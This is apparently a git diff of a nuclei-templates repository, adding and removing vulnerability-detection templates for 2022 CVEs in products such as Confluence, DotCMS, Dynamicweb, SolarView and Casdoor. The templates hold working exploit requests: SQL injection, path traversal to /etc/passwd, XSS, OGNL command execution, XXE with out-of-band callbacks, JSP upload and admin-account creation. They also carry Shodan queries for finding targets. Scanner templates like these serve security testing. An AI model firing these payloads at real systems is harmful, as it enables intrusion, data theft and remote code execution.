description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + reference: + - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html + - https://www.exploit-db.com/exploits/50792 + - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget + - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 + metadata: + product: https://casdoor.org/ + shodan-query: http.title:"Casdoor" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24124 + cwe-id: CWE-89 + tags: cve,cve2022,casdoor,sqli,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "XPATH syntax error.*'" + - "casdoor" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-24181.yaml b/nuclei-templates/CVE-2022/cve-2022-24181.yaml deleted file mode 100644 index b3b7ce9f12..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-24181.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2022-24181 - -info: - name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting - author: lucasljm2001,ekrause - severity: medium - description: | - PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. - remediation: | - Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor. - reference: - - https://www.exploit-db.com/exploits/50881 - - https://github.com/pkp/pkp-lib/issues/7649 - - https://youtu.be/v8-9evO2oVg - - https://nvd.nist.gov/vuln/detail/cve-2022-24181 - - https://github.com/comrade99/CVE-2022-24181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24181 - cwe-id: CWE-79 - epss-score: 0.0017 - epss-percentile: 0.53018 - cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: public_knowledge_project - product: open_journal_systems - tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project - -http: - - raw: - - | - GET /iupjournals/index.php/esj HTTP/2 - Host: {{Hostname}} - X-Forwarded-Host: foo">alert(document.domain)' - - '"Not authenticated"' - condition: and - - - type: word - part: header - words: - - text/html -# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24900.yaml b/nuclei-templates/CVE-2022/cve-2022-24900.yaml new file mode 100644 index 0000000000..5197c4d2ea --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24900.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-24900 + +info: + name: Piano LED Visualizer 1.3 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. + reference: + - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 + - https://vuldb.com/?id.198714 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 + - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2022-24900 + cwe-id: CWE-668,CWE-22 + epss-score: 0.00999 + epss-percentile: 0.81936 + cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: piano_led_visualizer_project + product: piano_led_visualizer + tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project + +http: + - method: GET + path: + - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24990.yaml b/nuclei-templates/CVE-2022/cve-2022-24990.yaml new file mode 100644 index 0000000000..39916d1f52 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24990.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-24990 + +info: + name: TerraMaster TOS < 4.2.30 Server Information Disclosure + author: dwisiswant0 + severity: medium + description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. + reference: + - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ + metadata: + shodan-query: TerraMaster + tags: cve,cve2022,terramaster,exposure + classification: + cve-id: CVE-2022-24990 + +requests: + - method: GET + path: + - "{{BaseURL}}/module/api.php?mobile/webNasIPS" + headers: + User-Agent: "TNAS" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" + - "TerraMaster" + condition: and + + - type: regex + part: body + regex: + - "webNasIPS successful" + - "(ADDR|(IFC|PWD|[DS]AT)):" + - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick + condition: or + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-25323.yaml b/nuclei-templates/CVE-2022/cve-2022-25323.yaml new file mode 100644 index 0000000000..4500863480 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-25323.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-25323 + +info: + name: ZEROF Web Server 2.0 Cross-Site Scripting + author: pikpikcu + severity: medium + description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + reference: + - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 + tags: xss,cve,cve2022,zerof + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2022-25323 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/admin.back" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'back' + condition: and + + - type: status + status: + - 401 + +# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2022/cve-2022-25369.yaml b/nuclei-templates/CVE-2022/cve-2022-25369.yaml deleted file mode 100644 index 27006db770..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-25369.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-25369 - -info: - name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation - author: pdteam - severity: critical - description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. - remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0." - reference: - - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 - metadata: - shodan-query: http.component:"Dynamicweb" - tags: cve,cve2022,dynamicweb,rce,unauth - classification: - cve-id: CVE-2022-25369 - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-425 - -requests: - - method: GET - path: - - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"Success": true' - - '"Success":true' - condition: or - - - type: word - part: header - words: - - 'application/json' - - 'ASP.NET_SessionId' - condition: and - case-insensitive: true - - - type: status - status: - - 200 - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-26134.yaml b/nuclei-templates/CVE-2022/cve-2022-26134.yaml new file mode 100644 index 0000000000..f674d3e63d --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26134.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-26134 + +info: + name: Confluence - Remote Code Execution + author: pdteam,jbertman + severity: critical + description: | + Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. + reference: + - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis + - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html + - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + - https://jira.atlassian.com/browse/CONFSERVER-79016 + - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26134 + cwe-id: CWE-917 + epss-score: 0.97528 + epss-percentile: 0.9999 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: atlassian + product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian + +http: + - method: GET + path: + - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" + - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/" + + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(to_lower(header_1), "x-cmd-response:")' + + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(to_lower(response_2), "confluence")' + condition: and + + extractors: + - type: kval + kval: + - "x_cmd_response" + part: header +# digest: 490a00463044022043923188d8f26d3bad64b5b6194f0d26c0205ef1d053c1e84a0b3122538323a802202d862f6fca847a1e99d6ec7e4b694f266cd8b0409ca139653667b057d5873735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26148.yaml b/nuclei-templates/CVE-2022/cve-2022-26148.yaml deleted file mode 100644 index edf32a34c5..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26148.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2022-26148 - -info: - name: Grafana Zabbix Integration - Credential Disclosure - author: Geekby - severity: critical - description: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 - - https://2k8.org/post-319.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-26148 - metadata: - fofa-query: app="Grafana" - shodan-query: title:"Grafana" - tags: cve,cve2022,grafana,zabbix - -requests: - - method: GET - path: - - "{{BaseURL}}/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '"password":"(.*?)"' - - '"username":"(.*?)"' - condition: and - - - type: word - part: body - words: - - '"zabbix":' - - '"zbx":' - - "alexanderzobnin-zabbix-datasource" - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - '"password":"(.*?)"' - - '"username":"(.*?)"' - - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26159.yaml b/nuclei-templates/CVE-2022/cve-2022-26159.yaml new file mode 100644 index 0000000000..5ad8567611 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26159.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-26159 + +info: + name: Ametys CMS Information Disclosure + author: Remi Gascou (podalirius) + severity: medium + description: "Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 + - https://podalirius.net/en/cves/2022-26159/ + tags: cve,cve2022,plugin,ametys,cms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-26159 + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' + + matchers-condition: and + matchers: + - type: word + words: + - '' + - '' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml b/nuclei-templates/CVE-2022/cve-2022-26233.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-26233.yaml rename to nuclei-templates/CVE-2022/cve-2022-26233.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-26352.yaml b/nuclei-templates/CVE-2022/cve-2022-26352.yaml deleted file mode 100644 index 9c61ad1df1..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26352.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2022-26352 - -info: - name: DotCMS - Arbitrary File Upload - author: h1ei1 - severity: critical - description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. - impact: | - Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix this vulnerability. - reference: - - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 - - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html - - https://groups.google.com/g/dotcms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-26352 - cwe-id: CWE-22 - epss-score: 0.97527 - epss-percentile: 0.99989 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: dotcms - product: dotcms - tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive - -http: - - raw: - - | - POST /api/content/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 - - --------------------------aadc326f7ae3eac3 - Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" - Content-Type: text/plain - - <% - out.println("CVE-2022-26352"); - %> - --------------------------aadc326f7ae3eac3-- - - | - GET /{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'contains(body_2, "CVE-2022-26352")' - - 'status_code_2 == 200' - condition: and -# digest: 4a0a004730450221009c0b8e26c1757e843516d1eb93bbf57c5a4c28cc367a24ab2913efc1c620261f02203b7f5ecae948b47821751b0eb7531ddf83eceedbcf0ad01c51e5710a9da998bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26564.yaml b/nuclei-templates/CVE-2022/cve-2022-26564.yaml deleted file mode 100644 index 0dcca515bd..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26564.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2022-26564 - -info: - name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting - author: alexrydzak - severity: medium - description: | - HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://rydzak.me/2022/04/cve-2022-26564/ - - https://www.hoteldruid.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-26564 - cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39401 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: digitaldruid - product: hoteldruid - shodan-query: http.favicon.hash:-1521640213 - tags: cve,cve2022,hoteldruid,xss,digitaldruid - -http: - - method: GET - path: - - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22>' - - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22>&idclienti=1' - - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22>' - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "HotelDruid" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4b0a00483046022100cce687826fa0938f4944c77a726102f036638a7225beea50d91d7f4aba881ee4022100d38d31a915a08dd7ac2ccff9c5cdb5683ccf782cc375359389be457f415998d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-27927.yaml b/nuclei-templates/CVE-2022/cve-2022-27927.yaml new file mode 100644 index 0000000000..1ff0eadb94 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-27927.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-27927 + +info: + name: Microfinance Management System 1.0 - SQL Injection + author: lucasljm2001,ekrause + severity: critical + description: | + Microfinance Management System 1.0 is susceptible to SQL Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip + - https://www.exploit-db.com/exploits/50891 + - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 + - https://www.sourcecodester.com/php/14822/microfinance-management-system.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-27927 + cwe-id: CWE-89 + epss-score: 0.10451 + epss-percentile: 0.94459 + cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: microfinance_management_system_project + product: microfinance_management_system + tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project +variables: + num: "999999999" + +http: + - raw: + - | + GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 +# digest: 490a00463044022100f2330cc77d89bc9dfac599714252cb298c5cb445f575714fdaa3d22ce52302d0021f4591789a7daf3fbe297cb9f3ea7331553a85261ca6027546cac70619c403fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28219.yaml b/nuclei-templates/CVE-2022/cve-2022-28219.yaml new file mode 100644 index 0000000000..1d27898b64 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28219.yaml @@ -0,0 +1,67 @@ +id: CVE-2022-28219 + +info: + name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an + unauthenticated XML entity injection attack that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system. + remediation: | + Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus + is configured with a dedicated service account with restricted privileges. + reference: + - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html + - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 + - http://cewolf.sourceforge.net/new/index.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-28219 + cwe-id: CWE-611 + epss-score: 0.97392 + epss-percentile: 0.99909 + cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_adaudit_plus + shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp + +http: + - method: POST + path: + - "{{BaseURL}}/api/agent/tabs/agentData" + + body: | + [ + { + "DomainName": "{{Host}}", + "EventCode": 4688, + "EventType": 0, + "TimeGenerated": 0, + "Task Content": " %xxe; ]>" + } + ] + + headers: + Content-Type: application/json + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "ManageEngine" +# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28365.yaml b/nuclei-templates/CVE-2022/cve-2022-28365.yaml new file mode 100644 index 0000000000..17c731df63 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28365.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-28365 + +info: + name: Reprise License Manager 14.2 - Information Disclosure + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-4g2v-6x25-vr7p + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-28365 + cwe-id: CWE-668 + tags: cve,cve2022,exposure,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/rlminfo" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Version" + - "Platform type" + condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-29298.yaml b/nuclei-templates/CVE-2022/cve-2022-29298.yaml new file mode 100644 index 0000000000..38ffe1f6b1 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29298.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-29298 + +info: + name: SolarView Compact 6.00 - Local File Inclusion + author: ritikchaddha + severity: high + description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00. + reference: + - https://www.exploit-db.com/exploits/50950 + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 + - https://github.com/20142995/pocsuite3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29298 + cwe-id: CWE-22 + epss-score: 0.1374 + epss-percentile: 0.95497 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: contec + product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" + tags: cve,cve2022,lfi,solarview,edb,contec + +http: + - method: GET + path: + - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29299.yaml b/nuclei-templates/CVE-2022/cve-2022-29299.yaml new file mode 100644 index 0000000000..d334a36759 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29299.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-29299 + +info: + name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting + author: For3stCo1d + severity: medium + description: | + SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. + reference: + - https://www.exploit-db.com/exploits/50967 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cve-id: CVE-2022-29299 + epss-score: 0.00175 + epss-percentile: 0.53704 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-244067125 + tags: cve2022,cve,xss,solarview,edb + +http: + - method: GET + path: + - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<"">' + - '/Solar_History.php" METHOD="post">' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/cve-2022-29303.yaml new file mode 100644 index 0000000000..3f9b0f07ff --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29303.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-29303 + +info: + name: SolarView Compact 6.00 - OS Command Injection + author: badboycxcc + severity: critical + description: | + SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. + remediation: | + Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. + reference: + - https://www.exploit-db.com/exploits/50940 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 + - 